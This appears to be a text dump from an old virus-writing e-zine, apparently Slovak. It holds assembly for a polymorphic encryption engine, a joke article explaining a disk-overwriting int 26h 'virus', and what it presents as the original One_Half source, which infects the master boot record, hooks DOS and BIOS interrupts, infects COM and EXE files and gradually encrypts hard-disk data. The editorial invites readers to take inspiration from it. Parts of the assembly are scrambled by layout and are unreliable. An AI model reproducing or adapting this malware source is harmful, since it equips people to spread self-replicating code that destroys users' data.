stosb retn drop_prefix: cmp al,DSs je dp_x add al,20h stosb dp_x: retn random_g_mem: mov ax,248 call random add ax,offset gb_mem retn orah: cmp [lock_ind],1 jnz ora1 call decision jz ora2 ora1: or ah,6 stosw mov ax,[si].mcm_ofs stosw retn ora2: or ah,[mind] stosw mov ax,[si].mcm_ofs sub ax,[ug] stosw retn COMl macro s0,s1,s2,s3 mov ax,&s0+&s1*100h mov bx,&s2+&s3*100h endm COMh macro d0,d1,d2,d3 mov cx,&d0+&d1*100h mov dx,&d2+&d3*100h call recurser endm


macro s0,s1,s2,s3,d0,d1,d2,d3 mov ax,&s0+&s1*100h mov bx,&s2+&s3*100h mov cx,&d0+&d1*100h mov dx,&d2+&d3*100h call recurser endm cx_size equ 4*3+1 get_random_reg: mov ax,7 call random test al,4 jz grr inc al grr: retn gen_em: call get_random_reg mov [use_reg],al gend: call get_ind cmp al,[use_reg] je gend


mov [indy],al call reg2adr or al,80h mov [mind],al mov [lock_reg],1 mov [lock_ind],2 retn gen_disable: call gen_em mov ax,offset disable_data call gen_c mov al,0CFh stosb retn gen_enable: call gen_em mov ax,offset enable_data call gen_c mov al,0CFh stosb retn gen_c: cld push di mov si,offset buf2 sl: call ax sx: mov byte ptr [si],0ffh pop di mov si,offset buf2 call compiler retn enable_data: mov al,t_reg mov ah,[use_reg] COMh t_stack,0,0,0 mov al,t_reg mov ah,[indy] COMh t_stack,0,0,0 call random0 xchg ax,bx mov al,t_const mov [ug],bx mov cl,t_reg mov ch,[indy] call recurser COMx t_seg,DSs,0,0 COMx t_const,0,0,0 COMl t_mem,DSs,4,0 mov cx,t_mem+100h*CSs mov dx,[__old_1] call recurser COMl t_mem,DSs,6,0 mov cx,t_mem+100h*CSs mov dx,[__old_1] inc dx inc dx call recurser

t_stack,0,0,0 t_seg,DSs,0,0


mov ax,t_mem+256*CSs mov bx,[__engine] COMh t_mem,DSs,4,0 COMx t_seg,CSs,0,0, COMx t_stack,0,0,0, COMl t_stack,0,0,0 mov cl,t_reg mov ch,[indy] call recurser COMl t_stack,0,0,0 mov cl,t_reg mov ch,[use_reg] call recurser aax: mov ax,1000h call random or ah,3 mov bx,ax mov al,t_const mov cl,t_stack dec [lock_reg] call recurser COMx t_seg,CSs,0,0, mov al,t_const mov bx,MK COMh t_stack,0,0,0 retn disable_data: mov al,t_reg mov ah,[use_reg] COMh t_stack,0,0,0 mov al,t_reg mov ah,[indy] COMh t_stack,0,0,0 call random0 xchg ax,bx mov al,t_const mov [ug],bx mov cl,t_reg mov ch,[indy] call recurser COMx t_seg,DSs,0,0 COMx t_const,0,0,0 mov ax,t_mem+100h*CSs mov bx,[__old_1] COMh t_mem,DSs,4,0 mov ax,t_mem+100h*CSs mov bx,[__old_1] inc bx inc bx COMh t_mem,DSs,6,0 COMx t_stack,0,0,0 COMl t_stack,0,0,0 mov cl,t_reg mov ch,[indy] call recurser COMl t_stack,0,0,0 mov cl,t_reg

t_mem,DSs,6,0 t_seg,DSs,0,0

; 0..0fff



t_stack,0,0,0 t_seg,DSs,0,0



mov ch,[use_reg] call recurser retn gen_engine: cld call gen01 jmp pushq mk1: jmp gen02 mk6: retn get_ind:mov ax,3 call random jnz g1x sub al,2 g1x: add al,5 retn gen01: call get_ind mov [i0],al g1a: call get_ind cmp [i0],al je g1a mov [i1],al call get_ind mov [i2],al call decision mov [s0],al retn pushq: mov [sp1],sp mov dx,sp sub ah,ah cld mov si,offset i0 mov cl,100h-3 pq0: lodsb or al,50h call isin je pq6 push ax pq6: inc cl jnz pq0 pq2: mov al,[si] call seg_push add al,6 push ax mov bx,sp mov dx,[sp1] sub dx,bx call chaos mov si,[sp1] pq3: dec si dec si mov al,ss:[si] stosb cmp si,sp jne pq3 jmp mk1


popq: pq5: pop ax inc al test al,40h jz pq4 add al,7 pq4: stosb cmp [sp1],sp jne pq5 jmp mk2

gen02: mov [sp2],sp xor si,si mov cl,100h-4 push si push si g2a: push si lodsw inc cl jnz g2a mov ax,5 call random add ax,2 xchg cx,ax g2b: mov ax,7 call random push ax dec cx jnz g2b mov bx,sp mov dx,[sp2] sub dx,bx call chaos mk3: mov si,offset buf2 mov al,[i0] mov [use_reg],al mov ax,t_seg+100h*CSs mov cl,al mov ch,DSs call recurser mov ch,[i1] mov [use_reg],ch mov ch,[i0] mov cl,t_reg mov ax,t_reg+4*256 call recurser mov ch,[i1] mov ax,t_mem+100h*CSs mov bx,[__oldptr] mov cl,t_reg call recurser mov byte ptr [si],0ffh mov si,offset buf2 call compiler


mov [ec_new],di mov [neg00],0 mov al,[i1] call reg2adr xx2: mov [adr00],al mov al,[s0] mov [seg00],al mov si,sp mov [sp3],si cld xx1: lods word ptr ss:[si] mov [ofs00],al push word ptr [rseed] push word ptr [rseed+2] mov al,[i1] xx3: mov [reg00],al call gen00 cmp si,[sp2] jne xx1 mov [ecn_end],di mov al,[i0] call reg2adr mov ah,byte ptr [sp1] sub ah,byte ptr [sp2] xchg ax,bx call decision jz fuck_1 mov ax,08b36h stosw xchg ax,bx mov bl,[i2] shl bl,3 or al,01000000b or al,bl stosw jmp short fuck_2 fuck_1: mov ax,0ff36h stosw xchg ax,bx or al,070h stosw mov ch,[i2] mov [use_reg],ch mov ax,t_stack mov cl,t_reg mov si,offset buf2 call recurser mov byte ptr [si],0ffh mov si,offset buf2 call compiler fuck_2: mov [dc_new],di mov [neg00],1 mov al,[i2] call reg2adr



mov [adr00],al mov al,[s0] mov [seg00],al mov si,[sp2] dec si dec si mov ax,ss:[si] mov [ofs00],al pop word ptr [rseed+2] pop word ptr [rseed] mov al,[i2] mov [reg00],al call gen00 cmp si,[sp3] jne xb1 mov ax,[sp2] sub ax,sp add sp,ax mov [dcn_end],di mov ah,[i2] mov [use_reg],ah mov si,offset buf2 mov cx,t_mem+100h*CSs mov dx,[__oldptr] mov al,t_reg call recurser mov byte ptr [si],0ffh mov si,offset buf2 call compiler


jmp popq mk2: mov al,0cfh stosb jmp mk6 gen00: mov ax,4 call random or al,al jnz g0d mov al,2eh jmp g0c g0d: mov al,[seg00] or al,al jnz g0e mov al,26h g0c: stosb g0e: mov ax,tab00size*4 call random and al,0fch mov bx,ax add ax,offset tab00 call ax mov dl,[neg00] test ah,dl jz g0h xor bl,4 mov ax,bx


add call g0h:

ax,offset tab00 ax

and ah,0feh ah,[adr00] bl,offset trg00-offset tab00 g0g dl,[reg00] dl,3 ah,dl g0g: cmp [ofs00],0 jne g0a and ah,03fh stosw jmp g0f g0a: stosw mov al,[ofs00] stosb g0f: cmp bl,offset tim00-offset tab00 jb g0b call random0 stosw g0b: retn or cmp jae mov shl or tab00: db db trg00: db db db db db db tim00: db db db db 0B8h,001h,01000001b,0c3h ; add ,reg 0B8h,029h,01000001b,0c3h ; sub 0B8h,031h,01000000b,0c3h ; xor 0b8h,0f7h,01011000b,0c3h 0b8h,0ffh,01000001b,0c3h 0b8h,0ffh,01001001b,0c3h 0b8h,0d0h,01000001b,0c3h 0b8h,0d0h,01001001b,0c3h 0b8h,0f7h,01010000b,0c3h 0b8h,081h,01110000b,0c3h 0b8h,081h,01000001b,0c3h 0b8h,081h,01101001b,0c3h ; ; ; ; ; ; neg inc dec rol ,1 ror ,1 not

- byte - byte

; xor ; add ,immw ; sub

tab00end tab00size

label equ (offset tab00end-offset tab00)/4

chaos: pusha push ds push ss pop ds mov cx,dx ch0: mov ax,dx call random and al,0feh mov si,ax mov ax,dx call random and al,0feh mov di,ax mov ax,[si+bx] xchg ax,[di+bx] mov [si+bx],ax dec cx jnz ch0 pop ds popa


retn isin: mov add ii1: je cmp je inc inc jmp ii2: ii0: retn seg_push: or al,al jz sp_xx mov al,18h sp_xx: retn reg2adr: sub al,2 cmp al,1 jne r2a mov al,7 r2a: retn pusha si,sp si,16+2 cmp si,dx ii2 ss:[si],ax ii0 si si ii1 inc si popa

getlost_po: add mov mov add mov mov mov pop pop mov mov call onmt:

mov ax,[dcn_end] ax,[b2] [dco_end],ax ax,[dc_new] ax,[b2] [dc_old],ax si,[__old_1] [old1_ofs],si [si+2] [si] ax,[m1] [si+4],ax


gen_preint mov ax,18h call random add al,40h cmp al,50h jb okaa add al,40h mov byte ptr [start_v],al and al,7 cmp al,4 je onmt push cs pop es mov si,offset rcpt mov di,offset safe movsw movsb


mov cx,[bitch] call fake_seg xor di,di xor si,si shr cx,1 rep movsw mov di,cs:[bitch] add di,decr_code mov cx,offset c_aft+1 sub cx,di shr cx,1 rep movsw

call fake_seg xor si,si mov di,offset c_aft mov cx,cs:[__old_1] sub cx,di rep movsb add di,gb_len mov cx,offset start_v sub cx,di rep movsb mov di,offset dil_heap mov cx,dil_len/2 rep movsw call cr_randomize push pop ds retn MORPH: pusha mov di,sp mov cl,0 mov al,0ffh db 'ENGINE OF ETERNAL ENCRYPTION' mov ax,di sub ax,sp add sp,ax popa call push pop ds POWERUP cs cs

mov al,byte ptr [dis_val] mov byte ptr [rcpt],al pre_prepare: call dil_gen mov si,[old1_ofs] push [si] push [si+2] push pop ds cs

mov ax,sp shr ax,4


mov bx,ss add ax,bx add ax,ss_distance mov [empty_seg],ax mov si,[ecn_end] push [si] mov byte ptr [si],0c3h xor ax,ax mov es,ax mov [sp_tmp],sp pusha pusha push TF push cs push offset start_v+1 mov si,[dco_end] mov [oldptr_2],offset pred+1 push offset prepare_re

push 0 push cs push offset rcpt END_offset: iret nop db Maxinst dup (?) endv: heapbeg: block_beg block_len dc_old dco_end old1_ofs disable__ old_ss old_sp old_ip old_cs ent__ bitch dis_val: data_12e: d_beg: rcpt: rcBUF db 8+2 dup (?) UMB_link dw ? UMB_strategy dw ? old_21 d_end: dataend: block: dd ? dw offset block-offset start dw 1 dw offset dc_oldx dw offset dc_oldx dw dw dw dw dw dw offset old1 offset disable ? ? ? ?

dw offset ent_+1 dw 100h retn



dil_len equ 12aeh-1199h+1+4 getlost label prepare_re equ getlost+59h reCRYPT equ getlost+69h dil_heap db dil_len dup (?) ec_new dw ? dc_new dw ? ecn_end dw ? dcn_end dw ? temp_seg dw ? b2 dw ? ; bitch II safe db 3 dup(?) oldptr_2 dw ? m1 dw ? len_add dw ? new_enable db decr_code dup (?) sp_tmp time date buffer create empty_seg hook21 seg00 reg00 adr00 ofs00 neg00 i0 i1 i2 s0 db db db db db db db db db ? ? ? ? ? ? ? dw dw dw db dw dw dw ? ? ? ? ? ? ? ? headerlen dup (?) ? ? ?,?

sp1 dw sp2 dw sp3 dw

use_reg db ? indy db ? mind db ? ug dw ? lock_ind db ? lock_reg db ? temp dw ? buf2 db 400h dup (?) __old_1 __entry __engine __oldptr __ks rseed rtemp dw dw dw dw dw ? ? ? ? ?

dw ?,? dw ?

heapend: temp_buf:


end start

The Ultimate Solution
The world's smallest virus ever.

Editorial. So dudes, here is another kick the ass contribution to our zine. Smallest virus in the world. Enjoy it and don't get infected. So pay attention to your A: drive. Maybe you get the feeling the contribution is unreal, but remember this is no AF edition....

So enjoy the article by Vyvojar

Kyjacisko alias Budzogan

Halloa. The smallest virus ever comes. From Slovakia, of course. From Vyvojar, of course. It's so small it can spread orally. Just tell your friend 8B DE CD 26 and there it is - replicated. Now. The xtra quick intro to writing a virus. All you need is two instructions. First one is variable (polymorphism of fundamental level). So, whether you write 8B DE or B7 01 it doesn't matter that much and the conversation gets more colorful. All you need to get across is to put the right values into the right register (the one and only BX). So and one half is done. Press any key to continue... Second instruction is, unfortunately, not polymorphic, but it works. It goes CD 26 and simply tells the machine to spread the virus. Virus is now replicated - hopefully. Extra bonus: it's stealth (a little bit). And heuristics don't stand a chance. Possibly it infects archives as well (ZIP, ARJ, RAR etc.) ...

What history tells us. The first attempts to write a short virus date far back. Most of them are overwriting non-TSR tings. There has been a conference (virus-l) on the internet and they concluded the smallest ever was some Trivial.22 chap (gosh, 500% bigger than Kyjacisko). Note for non-Slovak residents: if you don't know what Kyjacisko (Budzogan respectively) means, consult the Slovak embassy near you. If you don't know who Vyvojar is, you are not supposed to read this mag anyway.

The serious part. Requirements: Works exclusively with MS-DOS, tested with 5.0+ (no win business, folks). Requires 4b free RAM (except for PSP and tings like that). First instruction sets the BX register to 100h. You can achieve tis in several different ways. E.g. mov bx,si (A alternative), mov bh,01 (alt B) etc etc. Second instruction runs int 26h. Now, we need several tings for tis interrupt. Following registers should be set like dis:
AL contains the disk drive number.
ES:BX buffer to be written down.
CX number of sectors to be written.
DX logical sector number.
Dis is all for today.

And now, let's see how Microsoft set the registers for us.
AL = 0 (mostly) ........................... documented
BX = AX = 0 (we set to 100h, remember?) ... undocumented
CX = FFh .................................. undocumented
DX = ES = PSP segment = base address ...... partially documented
It should be all safe and clear now.

So the virus writes itself (or in fact 255 sectors) somewhere to the disk A:, where "somewhere" is determined by the PSP value. If the starting sector number of a .COM or .EXE file is identical with the DX value, such a file gets infected. Often people start panicking like "how will it all end, what a bunch of data will be lost or it isn't a 4B virus when it writes 255 sectors etc etc". The answer, my friend, is written in the empirical facts of other viruses as well as in the definition of a virus itself.

OK I'm finished and so is the virus. Code you can get from any good BBS or by fax or by a telephone call from a friend. It is also included in the supplement to tis file. The motto of the day. "As WindowsTM get longer, good things get shorter." Vyvojar


The only authentic One_Half source code. Exclusively for the *-zine.
Editorial
You may remember the time of its outbreak. It was horrible, unknown and effective. It encrypted your data. It was One_Half. Still on the scene, still in the wild, still in the wild list. Here comes the source.
Disclaimer
The code presented below is one of the most successful viruses in history. It can (under some circumstances) destroy your data. If you compile it, it's on you what you'll do with the executable file. We don't care. Guilty for any damage is that asshole who executes it.

Dear friends, some time has already passed since the great days of the One Half epidemic. Nevertheless we still hope that the code of this popular virus inspires you also now. A lot of stuff has been written on the subject, so I tink, not many words are necessary about this little creature any more. And, so, here is the original source of One_Half.3577. Vyvojar

OneHalf.3544
OneHalf aka Slovak Bomber aka Explosion II is a multipartite resident COM'n'EXE virus. When an infected file is executed, OneHalf infects the MBR of the hard disk. The original contents of the MBR will be stored on track 0, in the 8th sector counted from the last one. The MBR will be altered and the viral body will be placed in the last 7 sectors of track 0. Then OneHalf looks for the last active DOS partition table (or extended partition table). Then the numbers of the first and last sector of this partition will be computed and stored at offset 29h in the MBR. Starting from this moment, on every system reboot the virus decrements this variable by 2 and encrypts the 2 cylinders pointed to by this variable. This means very slow disk encryption. The encrypted areas on disk are decrypted on demand, but only when the virus is memory resident. Attempts to remove the virus via a clean boot and FDISK /MBR are the best way to lose your data. I just forgot to say that OneHalf is a stealth virus. OneHalf infects files on floppy disks and network drives, but not on the local hard drive. This is a very good and effective strategy of spreading. We were told the virus was in the very beginning planted in the field on 3 computers in a university lab. And look - now it is spread world wide.

In the infected file, the virus decryptor is divided into 10 parts, which are spread across the whole infected file. These parts are connected together by 2 types of jumps and, of course, there are also some garbage instructions, randomly chosen from 10 possible ones.

When one half of the disk is encrypted, the virus, depending on the system date and generation, prints the following message to the screen: Dis is one half. Press any key to continue... The body also contains the string "Did you leave the room ?", related to the Explosion virus by the same author.


;Dear friends, ;some time has already passed since the great days of One Half epidemy. ;Nevertheless we still hope that a code of this popular virus inspires ;you also now. A lot of stuff has been written on the subject, so I tink, ;not many words are necessary about this little creature any more. ;And, so, here is the original source of One_Half.3577: DOSSEG .MODEL SMALL .STACK 100h Vkod SEGMENT 'kod' ASSUME CS:Vkod,DS:Vkod

stvir LABEL near POCKIL=4 ;virus length in kB DB 05ah owner DW ? DW POCKIL*1024/16-1 DB 00h,00h,00h,'COMMAND',00h ;MCB header DLZVIR=(OFFSET endvir-OFFSET stvir) ;virus length POCSEC=((DLZVIR-1)/512+1) ;number of sectors needed POCINS=10 ;number of instructions DLZINS=10 ;instruction length DLZBUFF=512 ;buffer length DLZZAS=81h ;stack length VRCHOL=(OFFSET endvir+DLZBUFF+DLZZAS) ;top POCTRACK=2 ;track number DLZFNB=64 ;file name max. length strc id DW lpage pages items parps min max vSS vSP flag DB vIP vCS iaddr strc bheader poss posss orprg v16 DW v30 DW v512 STRUC ? DW ? DW ? DW ? DW ? DW ? DW ? DW ? DW ? DB ? ? ;check DW ? DW ? DW ? ENDS



strc <> DW POCINS DUP(?) DW ? ;positions of instructions DB POCINS*DLZINS DUP(?) 16 30 DW


;************ MBOOT ************ sboot: xor bx,bx cli mov sp,7c00h mov ss,bx sti


mov sub mov int shl mov mov sector: mov

ds,bx word ptr ds:0413h,POCKIL cl,6 12h ax,cl dx,0080h es,ax mov cx,0009h ax,(0200h+POCSEC) push es int 13h bootid: mov ax,OFFSET staboot push ax retf eboot LABEL near ;****************************** staboot:mov ds:(4*21h+2),cs mov ax,ds:046ch push ds push cs pop ds mov rnd1,ax ;RNG init mov ax,cs inc ax mov owner,ax ;MCB owner setting mov byte ptr ds:(OFFSET con3+1),00h ;condition for memory call Koppr ;copying of needed routines pop es mov bx,sp push es mov si,es:(bx+OFFSET eboot-OFFSET sboot) zactr: cmp si,500 ;everything encoded ? jbe uznk push si sub si,POCTRACK mov word ptr ds:(OFFSET cdft+2),si ;last track pop si mov ah,08h int 13h jc uznk mov al,cl and al,3fh ;al = number of sectors mov kolzak,al ;number of sectors to encode mov cl,01h mov bh,7eh mov odkzak,bx ;start to encode from mov dl,80h nttrc: dec si call Fromsi push dx nthd: mov ah,02h push ax int 13h pop ax jc perwd call Skramb inc ah push ax int 13h pop ax perwd: jc erwd


test dh,3fh jz tcid dec dh jmp nthd tcid: pop dx cdft: cmp si,100h ;last track ja nttrc jfcor: mov bh,7ch mov es:(bx+OFFSET eboot-OFFSET sboot),si mov ax,0301h mov cx,0001h mov dh,ch int 13h uznk: mov word ptr ds:(OFFSET cnflte+2),si aktcd: sub si,613 ja estne cmp si,-(3*POCTRACK-1) jb estne ;write it out 3x call Prejav

;for condition in res13

estne: mov ax,0201h mov bx,7c00h mov cx,word ptr ds:(OFFSET sector+1) dec cx mov dx,0080h int 13h ;read original boot cli les ax,es:(4*13h) mov word ptr oriv13,ax mov word ptr oriv13+2,es pop es push es les ax,es:(4*1ch) mov word ptr oriv1c,ax mov word ptr oriv1c+2,es pop es push es mov word ptr es:(4*13h),OFFSET res13 mov es:(4*13h+2),cs mov word ptr es:(4*1ch),OFFSET res1c mov es:(4*1ch+2),cs ;hook 13h and timer 1ch sti push bx retf erwd: xor ah,ah push ax int 13h pop ax enthd: inc dh mov ah,dh pop dx push dx cmp ah,dh ja ercor mov dh,ah mov ah,02h push ax int 13h pop ax call Skramb inc ah ;decode last track if error


push ax int 13h pop ax jmp enthd ercor: pop dx inc si jmp jfcor res1c: push ax push ds push es xor ax,ax mov ds,ax les ax,ds:(4*21h) mov word ptr cs:oriv21,ax mov ax,es cmp ax,0800h ja chnp mov word ptr cs:(oriv21+2),ax les ax,cs:oriv1c mov ds:(4*1ch),ax mov ds:(4*1ch+2),es ;unhook 1ch mov ds:(4*21h),OFFSET res21 mov ds:(4*21h+2),cs ;hook 21h chnp: pop es pop ds pop ax DB 0eah ;jump to original 1ch oriv1c DD ? Koppr PROC near mov si,OFFSET zZakoduj mov di,OFFSET Zakoduj mov cx,OFFSET kzZak-OFFSET zZakoduj cld rep movsb ;copy needed routines ret Koppr ENDP Fromsi PROC push ax mov ax,si mov ch,al push cx mov cl,4 shl ah,cl pop cx mov al,3fh and dh,al and cl,al not al push ax and ah,al or dh,ah pop ax shl ah,1 shl ah,1 and ah,al or cl,ah pop ax ret Fromsi ENDP near


mess1 ems1

DB 'Dis is one half.',0dh,0ah,'Press any key to continue ...',0dh,0ah LABEL byte

Prejav PROC near test order,11b ;only generations that are multiple of 4 jnz somewhere_in_town mov cx,OFFSET ems1-OFFSET mess1 mov si,OFFSET mess1 mov ah,0fh int 10h mov bl,07h mov ah,0eh freddey_lives: lodsb int 10h loop freddey_lives xor ah,ah int 16h somewhere_in_town: ret Prejav ENDP ;**************** file part ************** Pmip PROC near push bx DB 0bbh handle1 DW ? ;mov bx,handle1 int 21h pop bx ret Pmip ENDP tInt13 PROC pushf cli DB 09ah toriv13 DD ? ret tInt13 ENDP near

res01: push bp mov bp,sp con2: jmp short r1cn r1cn: cmp word ptr [bp+04h],1234h ja nsyet push ax push bx push ds lds ax,[bp+02h] DB 0bbh rlit DW ? mov word ptr cs:[bx+OFFSET toriv13],ax mov word ptr cs:[bx+OFFSET toriv13+2],ds mov byte ptr cs:[bx+OFFSET con2+1],OFFSET syet-OFFSET r1cn ;set condition pop ds pop bx pop ax syet: and byte ptr [bp+07h],0feh nsyet: pop bp iret ;**************** instalation to memory ******************



dec mov cmp jne

dec mov inc add cmp jb mov mov add shr inc add cmp jb

pop bx pop ax push ax ;ax = PSP ax ds,ax byte ptr ds:[00h],'Z' inchb add ax,ds:[03h] sub ax,(POCKIL*1024)/16-1 ;ax = virus segment mov dx,cs mov si,bx si cl,4 shr si,cl si ;si = paragraph count till beginning dx,si add dx,cs:[bx+OFFSET bheader.min] ;min memory request ax,dx inchb ;not enough room in memory dx,ss si,sp si,3 si,cl si dx,si ax,dx inchb

mov byte ptr ds:[00h],'M' sub word ptr ds:[03h],(POCKIL*1024)/16 mov ds:[12h],ax mov es,ax push cs pop ds inc ax mov word ptr [bx+OFFSET owner],ax mov byte ptr [bx+OFFSET vsetky],0ebh ;infect everywhere mov si,bx xor di,di mov cx,DLZVIR rep movsb push es pop ds call Koppr ;copy needed routines xor ax,ax mov ds,ax cli mov ax,ds:(4*21h) mov word ptr es:oriv21,ax mov ax,ds:(4*21h+2) mov word ptr es:(oriv21+2),ax mov word ptr ds:(4*21h),OFFSET res21 mov ds:(4*21h+2),es sti inchb: jmp aalldn start stsub: next: sub mov LABEL near call next pop si si,OFFSET next [si+OFFSET rlit],si

;relocation in trace


push push cld inc mov xor mov mov mov mov mov int cmp je

es si

word ptr [si+OFFSET order] ;generation byte ptr [si+OFFSET vsetky],74h ;dis is jz ... ax,ax es,ax ax,es:046ch [si+OFFSET rnd1],ax ;init RNG [si+OFFSET zls1+3],ax ;key for HD encoding ax,4b53h 21h ax,454bh palldn

mov ah,52h int 21h mov ax,es:[bx-02h] mov word ptr ds:[si+OFFSET r1cn+3],ax ;limit mov byte ptr ds:[si+OFFSET con2+1],00h ;set condition mov ax,3501h int 21h push bx push es mov ax,3513h int 21h mov word ptr [si+OFFSET toriv13],bx mov word ptr [si+OFFSET toriv13+2],es mov ax,2501h lea dx,[si+OFFSET res01] int 21h lea bx,[si+OFFSET endvir] mov cx,0001h mov dx,0080h push cs pop es pushf pop ax or ah,01h push ax popf mov ax,0201h call tInt13 pushf pop ax and ah,0feh push ax popf pop ds pop dx pushf mov ax,2501h int 21h popf jc pinstm push cs pop ds cmp word ptr [bx+(OFFSET bootid-OFFSET sboot)+1],OFFSET staboot jne ov444 palldn: jmp alldn


ov444: cmp word ptr [bx+180h],072eh je pinstm ;MASTER mboot protection mov ah,08h mov dl,80h call tInt13 jc pinstm and cx,00111111b ;CL = max. sector number mov byte ptr ds:(si+OFFSET znxtsc+2),cl ;for res13 mov [si+OFFSET mxskt],cl and dh,3fh mov [si+OFFSET mxhlv],dh ;max. head number for encoding mov ax,0301h sub cl,POCSEC mov byte ptr ds:(si+OFFSET zr13ds+2),cl ;for condition in int13 mov dx,0080h call tInt13 ;save original mboot jc pinstm push cx push dx push si xchg di,si mov cx,4 add bx,1eeh hlvp: mov al,[bx+04h] cmp al,01h je ptrif cmp al,04h jb chdnn cmp al,06h jbe ptrif chdnn: sub bx,10h loop hlvp pop si pop dx pop cx pinstm: jmp instm ptrif: mov cx,[bx+02h] mov dh,[bx+01h] call zTosi add si,POCTRACK+5 mov [di+OFFSET zactr+2],si xchg ax,si mov cx,[bx+06h] mov dh,[bx+01h] call zTosi mov [di+OFFSET kontr+2],si mov [di+OFFSET stpdb+1],si add ax,si shr ax,1 mov [di+OFFSET aktcd+2],ax pop si pop dx pop cx

;cylinder nearer to the beginning

;cylinder nearer to the end

;cylinder to activate

mov ax,(0300h+POCSEC) xchg bx,si inc cx mov word ptr ds:[bx+OFFSET sector+1],cx call tInt13 jc pinstm lea si,[bx+OFFSET sboot]


lea di,[bx+OFFSET endvir] push di mov cx,OFFSET eboot-OFFSET sboot rep movsb stpdb: mov ax,1234h stosw mov ax,0301h pop bx mov cx,0001h call tInt13 jc pinstm alldn: pop bx aalldn: push pop ds push cs pop es


lea si,[bx+OFFSET orprg] add bx,OFFSET poss mov cx,POCINS ssno: mov di,[bx] push cx mov cx,DLZINS rep movsb pop cx inc bx inc bx loop ssno ;restore code pop es add mov add add add cmp je mov xor bx,((OFFSET bheader-OFFSET poss)-POCINS*2) di,es di,10h [bx].vCS,di [bx].vSS,di

[bx].items,0 ssr4 ds,es:[2ch] si,si lfn: inc si cmp word ptr [si],0000h jne lfn add si,4 xchg dx,si mov ax,3d00h int 21h jc errlp push cs pop ds mov [bx+(OFFSET handle1-OFFSET bheader)],ax mov dx,[bx].iaddr mov ax,4200h call Pmip push es xchg ax,di ssr3: push ax lea dx,[bx+(OFFSET rbuff-OFFSET bheader)] mov cx,[bx].items cmp cx,((OFFSET endvir-OFFSET rbuff)+DLZBUFF)/4 jb ssr1


mov cx,((OFFSET endvir-OFFSET rbuff)+DLZBUFF)/4 ssr1: sub [bx].items,cx push cx shl cx,1 shl cx,1 mov ah,3fh call Pmip jc errlp pop cx pop ax xchg si,dx ssr2: add [si+2],ax les di,[si] add es:[di],ax add si,4 loop ssr2 cmp [bx].items,0 ja ssr3 ;relocation pop es mov ah,3eh call Pmip ssr4: push es pop ds cmp cs:[bx].flag,0 ;is it COM ? jne sEXE mov si,bx mov di,100h mov cx,3 rep movsb pop ax jmp short sCOM sEXE: pop ax cli mov sp,cs:[bx].vSP mov ss,cs:[bx].vSS sti sCOM: jmp dword ptr cs:[bx].vIP errlp: mov ah,4ch ;if error on program loading int 21h rbuff LABEL byte Rnd PROC NEAR mov word ptr cs:(OFFSET povsi+1),si push ax push bx push cx push dx DB 0b9h rnd2 DW 0000h DB 0bbh rnd1 DW ? ;<MOV DX,015Ah MOV AX,4E35h XCHG AX,SI XCHG AX,DX TEST AX,AX JZ r1 MUL BX r1: JCXZ r2 XCHG AX,CX MUL SI ADD AX,CX



XCHG AX,SI MUL BX ADD DX,SI INC AX ADC DX,0000h MOV cs:rnd1,AX MOV cs:rnd2,DX MOV ax,dx pop cx xor dx,dx jcxz rdbz ;division by zero div cx rdbz: pop cx pop bx pop ax pop si push si cmp byte ptr cs:[si],0cch cli neksl: je neksl sti povsi: mov si,1234h RET Rnd ENDP ;*************** mutation **************** kod: DB 1 kodpax: push ax DB 1 kodpcs: push cs DB 1 kodpds: pop ds DB 3 kodmsi: mov si,1100h DB 3 kodmbx: mov bx,1234h DB 2 kodxor LABEL near k01: xor [si],bx DB 4 kodabx: add bx,4567h DB 1 kodisi: inc si DB 4 kodcsi: cmp si,1103h DB 2 jne k01 POCRI=9 randi: nop stc clc sti DB 2eh ;cs: DB 3eh ;ds: cld std cmc Rndi or jz PROC dx,dx rintd near


push si push cx push dx mov cx,dx rinxt: mov si,OFFSET randi mov dx,POCRI call Rnd add si,dx movsb loop rinxt pop dx pop cx pop si rintd: ret Rndi ENDP Mtog PROC near mov ax,dx inc dx ;for all ins. could be before instruction call Rnd sub ax,dx call Rndi xchg dx,ax ;random ins. before instruction rep movsb ;instruction

cmp bx,OFFSET poss+2*9 ;jump ? jne mtnj mov ax,poss[2*5] sub ax,di add ax,OFFSET ibuf sub ax,[bx] ;ax=poss[2*5]-di+OFFSET ibuf-[bx] dec di stosb ;jump to marked instruction mtnj: call ret Mtog ENDP kodd DW DW kodi DW DW DW Rndi ;random ins. after instruction

DW OFFSET kodmbx OFFSET kodxor+1 OFFSET kodabx+1 DW OFFSET kodmsi OFFSET kodxor+1 OFFSET kodisi OFFSET kodcsi+1

;offset of instruction

Kodins PROC near kinxt: lodsw xchg di,ax mov al,dl cmp si,OFFSET kodi+2*2 jnz kint ;conversion when addressing and al,101b cmp al,001b jnz kins mov al,111b kint: jnz mov shl cmp si,OFFSET kodd+2*2 kins ;3 bit shift cl,3 al,cl


or or jmp kins: or kiad: cmp jz cmp jz jmp kiend: Kodins

[di],al al,0c7h short kiad or [di],al al,0f8h and [di],al si,OFFSET kodi kiend si,OFFSET Kodins kiend kinxt ret ENDP

MHeader PROC near fics: mov si,OFFSET kodd kom: mov dx,1000b call Rnd cmp dl,100b ;SP je kom mov bl,dl call Kodins ;encoding of data registers mov si,OFFSET kodi kbxa: mov dx,3 call Rnd add dl,110b cmp dl,08h jne kvf mov dl,011b ;BX kvf: cmp dl,bl je kbxa call Kodins ;encoding of address registers xor mov pnxt1: jne pom: cx,cx di,OFFSET poss cmp cx,9 pnl

;jump ?

mov dx,200 call Rnd sub dx,100 add dx,poss[2*5] cmp dx,0 jl pom cmp dx,DLZHDR jge pom jmp short pl

;return to 5. instruction

pnl: DB 0bah DLZHDR DW 1000 call Rnd pl: jcxz pfirst mov si,OFFSET poss push cx pnxt: lodsw sub ax,dx cmp ax,DLZINS jge pOK cmp ax,-DLZINS jle pOK pop cx




jmp pnxt1 pOK: loop pnxt pop cx pfirst: xchg ax,dx stosw inc cx cmp cx,POCINS jb pnxt1 ;******************************* mov bx,OFFSET poss mov si,OFFSET kod mnxt: mov di,OFFSET ibuf lodsb mov cl,al mov dx,DLZINS-3+1 sub dx,cx ;'cos range is 0 - (DLZINS-1)

